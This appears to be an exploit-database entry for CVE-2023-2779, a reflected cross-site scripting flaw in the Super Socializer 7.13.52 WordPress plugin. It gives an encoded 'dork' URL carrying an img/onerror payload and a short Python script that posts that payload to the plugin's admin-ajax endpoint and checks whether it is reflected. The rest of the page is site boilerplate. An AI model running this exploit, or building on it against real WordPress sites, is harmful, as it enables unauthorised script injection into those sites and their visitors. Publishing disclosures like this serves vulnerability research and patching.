Super Socializer 7.13.52 Reflected XSS

2023.07.03
Credit: Amirhossein Bahramizadeh
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2023-2779
CWE: CWE-79
Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS # Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/super-socializer # Version: 7.13.52 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-2779 import requests # The URL of the vulnerable AJAX endpoint url = "https://example.com/wp-admin/admin-ajax.php" # The vulnerable parameter that is not properly sanitized and escaped vulnerable_param = "<img src=x onerror=alert(document.domain)>" # The payload that exploits the vulnerability payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"} # Send a POST request to the vulnerable endpoint with the payload response = requests.post(url, data=payload) # Check if the payload was executed by searching for the injected script tag if "<img src=x onerror=alert(document.domain)>" in response.text: print("Vulnerability successfully exploited") else: print("Vulnerability not exploitable")


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top